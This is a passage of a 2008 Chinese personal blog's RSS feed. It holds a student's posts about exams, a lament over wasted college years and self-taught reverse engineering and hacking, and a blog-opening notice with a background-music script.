<p>其它方面,比如程序语言这种老生常谈的学习问题,我想大家每个人都有不同的方法!不用我来说了!</p>
<p>至于具体的入侵方法比如怎么跨站,怎么注入,怎么溢出,怎么用软件,我们等具体问题具体分析!我在这里就先偷个懒了!呵呵<br></p>
</fieldset>
<img src ="http://www.cppblog.com/boatcjz/aggbug/67829.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cppblog.com/boatcjz/" target="_blank">美丽の破船</a> 2008-11-25 18:18 <a href="http://www.cppblog.com/boatcjz/archive/2008/11/25/67829.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>考试了~，课本还没有开封~</title><link>http://www.cppblog.com/boatcjz/archive/2008/11/17/67109.html</link><dc:creator>美丽の破船</dc:creator><author>美丽の破船</author><pubDate>Mon, 17 Nov 2008 06:20:00 GMT</pubDate><guid>http://www.cppblog.com/boatcjz/archive/2008/11/17/67109.html</guid><wfw:comment>http://www.cppblog.com/boatcjz/comments/67109.html</wfw:comment><comments>http://www.cppblog.com/boatcjz/archive/2008/11/17/67109.html#Feedback</comments><slash:comments>1</slash:comments><wfw:commentRss>http://www.cppblog.com/boatcjz/comments/commentRss/67109.html</wfw:commentRss><trackback:ping>http://www.cppblog.com/boatcjz/services/trackbacks/67109.html</trackback:ping><description><![CDATA[现在就要考试了 &#183;~<br>在考场里真的不是什么好滋味哈 &#183;~~<br>我们这个学期的课程马上就要结课了 ~~<br>我的课本还没有开封&#183;~~~哎&#183;~<br>大学的生活太颓废了 &#183;~~<br><br>
<img src ="http://www.cppblog.com/boatcjz/aggbug/67109.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cppblog.com/boatcjz/" target="_blank">美丽の破船</a> 2008-11-17 14:20 <a href="http://www.cppblog.com/boatcjz/archive/2008/11/17/67109.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>心情不好，无乱的牢骚几句，发泄一下：还有8个月我就要失业了~~</title><link>http://www.cppblog.com/boatcjz/archive/2008/11/02/65728.html</link><dc:creator>美丽の破船</dc:creator><author>美丽の破船</author><pubDate>Sun, 02 Nov 2008 01:58:00 GMT</pubDate><guid>http://www.cppblog.com/boatcjz/archive/2008/11/02/65728.html</guid><wfw:comment>http://www.cppblog.com/boatcjz/comments/65728.html</wfw:comment><comments>http://www.cppblog.com/boatcjz/archive/2008/11/02/65728.html#Feedback</comments><slash:comments>6</slash:comments><wfw:commentRss>http://www.cppblog.com/boatcjz/comments/commentRss/65728.html</wfw:commentRss><trackback:ping>http://www.cppblog.com/boatcjz/services/trackbacks/65728.html</trackback:ping><description><![CDATA[<p>还有8个月，我就要失业了&#8230;&#8230;<br>不知道怎么的，有种特别凄凉的感觉！<br>或者是一种无助的空虚吧&#8230;&#8230;<br><br>这些天我经常问自己，我大学得到了什么！<br>不由得苦笑&#8230;&#8230;<img height=20 src="http://www.cnitblog.com/Emoticons/QQ/11.gif" width=20 border=0><br><br>看看我周围的同学，他们大学过也也算潇洒了：<br>有女朋友伴着&#8230;&#8230;<br>有游戏玩着&#8230;&#8230;<br>或者<br>因自己认为有趣的事情在忙碌着&#8230;&#8230;</p>
<p>至少，他们的大学有很多值得他们回忆的东西！<br><br>可我呢？<br><br>学习一塌糊涂<br>女朋友没有过&#8230;&#8230;（不对，应该是长了22年，就没有过女朋友！）<br>游戏，曾经玩过，后来觉得空虚，也就放下了！<br><br>曾经想过自己在大学要干一件让自己满意的事！<br>到今天，我还没有付出行动！——空想而已啊！！！<br>听起来我好像每天都无所事事的度日子哦！<br><br>可是是这样吗？<br>我扪心自问：<br><br>大一的时候，我曾经下决心，我学的是计算机专业，我要在软件安全领域闯出自己的天地！<br>我不是那种三天打鱼两天晒网办事虎头蛇尾的人！<br>所以，我整天的在学习，学习那些自己认为有用的东西！<br><br>我本以为，人生最重要的一课就是要学会选择，要学会选择那些自己认为重要的东西，放弃那些可以放弃的！<br><br>我放弃了与同学的玩耍，放弃了女朋友，放弃了烟台那么多好玩的地方！<br>整天的除了编程就是书，再就是电脑！<br>按理，我的大学生活应该很充实的啊！为什么现在会这么的空虚哦！<br><br>在大学里我好像是最忙的一个人了吧！（至少在我们班，我差不多是最忙的！）<br>早上起床开始那所谓的学习，看（kān）书，学习！<br>晚上熄灯以后，看书的貌似在我宿舍我自己是唯一一个了！<br><br>是啊，大学专心学了这么久的程序，看了那么多的书，似乎我真的成了一个高手哦！<br>从C/++在到VC的使用，从JAVA到J2EE，VB到ASP，我几乎都能玩的比较顺手！<br>从一开始简单的破解软件，到现在的学PE，写注册机，学虚拟机，学写壳&#8230;&#8230;<br>从简单的黑别人的网站到现在学逆向学ROOTKITS！<br>可是，到现在了，要写个我以前没写过的程序，离了MSDN，我几乎什么都干不了啊！<br>似乎写程序跟我无关，我只是MSDN的以后打杂的！<br>把MSDN里的东西拼一下，我要做的也只有这些&#8230;&#8230;<br><br>可能这些方面我了解的真的比一些年龄跟我相仿的朋友多那么一点！<br><br>而且貌似我真的很好学哦，我一直这么误认为的！<br>可是大学三年了，我上课的次数不够20节（包括考试）！！！<br><br>真的不知道，如果我父母知道了这些我该怎么去面对他们！<br><br>是啊，现在远没有当时的那种雄心壮志！<br>真的没想到我会因为工作而忧愁成现在的这个样子！<br><br>我一个普通大学的专科学生而且还是函授！<br>所以别跟我提什么大学生，有学历，找工作占优势！<br><br>编程方面的证书，我一个都没有！<br>唯独有的也就是学校计算机编程大赛的二等奖（貌似这个对于找工作没有什么作用哈）！<br><br>一想到曾经我大学的考试成绩：数学6分，英语12！我就想哭&#8230;&#8230;<br>我数学和英语这么个水平，几乎就注定了我搞编程不是那么回事！<br><br>大学三年了，我几乎没有出过校门&#8230;&#8230;<br>身为一个出生在烟台，又在烟台念了三年大学的我<br>几乎不知道烟台除了有我的学校和家之外还有什么别的地方！！！<br><br>学习，人迹社交，几乎什么都一无是处&#8230;&#8230;<br><br>听着别人说他大学经历过的有趣的事情，我心里就不是滋味！<br>我也算经历了大学一场，我有什么值得记忆，记得跟我的朋友聊的！<br>几乎没有，我整天面对的就是电脑，编程类的书，还有电脑！<br>一天天的都像是一张张空白的纸&#8230;&#8230;<br><br>难道我的大学真的白念了吗？<br><br>我现在学的所有的东西，几乎都是在高中，甚至初中都接触到了的！<br>大学只不过是把他们都在电脑上打了一边，实现了一下，仅此而已&#8230;&#8230;<br>或许这就是虚度吧~~ </p>
<img height=1 src="http://www.cnitblog.com/boatcjz/aggbug/50948.html" width=1><br><br>
<div align=right><a style="TEXT-DECORATION: none" href="http://www.cnitblog.com/boatcjz/" target=_blank>美丽の破船</a> 2008-11-01 20:54 <a style="TEXT-DECORATION: none" href="http://www.cnitblog.com/boatcjz/archive/2008/11/01/50948.html#Feedback" target=_blank>发表评论</a></div>
<img src ="http://www.cppblog.com/boatcjz/aggbug/65728.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cppblog.com/boatcjz/" target="_blank">美丽の破船</a> 2008-11-02 09:58 <a href="http://www.cppblog.com/boatcjz/archive/2008/11/02/65728.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>我的博客开张了！</title><link>http://www.cppblog.com/boatcjz/archive/2008/11/02/65729.html</link><dc:creator>美丽の破船</dc:creator><author>美丽の破船</author><pubDate>Sun, 02 Nov 2008 01:58:00 GMT</pubDate><guid>http://www.cppblog.com/boatcjz/archive/2008/11/02/65729.html</guid><wfw:comment>http://www.cppblog.com/boatcjz/comments/65729.html</wfw:comment><comments>http://www.cppblog.com/boatcjz/archive/2008/11/02/65729.html#Feedback</comments><slash:comments>1</slash:comments><wfw:commentRss>http://www.cppblog.com/boatcjz/comments/commentRss/65729.html</wfw:commentRss><trackback:ping>http://www.cppblog.com/boatcjz/services/trackbacks/65729.html</trackback:ping><description><![CDATA[开张了！<br>一直没有找到自己满意的博客！<br>希望这个是我换了好多个博客中的最后一个了！<br><img height=1 src="http://www.cnitblog.com/boatcjz/aggbug/50840.html" width=1><br><br>
<div align=right><a style="TEXT-DECORATION: none" href="http://www.cnitblog.com/boatcjz/" target=_blank>美丽の破船</a> 2008-10-29 18:17 <a style="TEXT-DECORATION: none" href="http://www.cnitblog.com/boatcjz/archive/2008/10/29/50840.html#Feedback" target=_blank>发表评论</a></div>
<iframe id=bgmusic width=30  height=20></iframe>
<script language=javascript>
function window.onload(){
var bghtml='sound<bgsound src="http://www.qianyi.cc/qianyi/images/music.mp3" loop="-1">';
bgmusic.document.body.innerHTML=bghtml;
document.all.bgmusic.removeNode();
}
</script><img src ="http://www.cppblog.com/boatcjz/aggbug/65729.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cppblog.com/boatcjz/" target="_blank">美丽の破船</a> 2008-11-02 09:58 <a href="http://www.cppblog.com/boatcjz/archive/2008/11/02/65729.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item></channel></rss>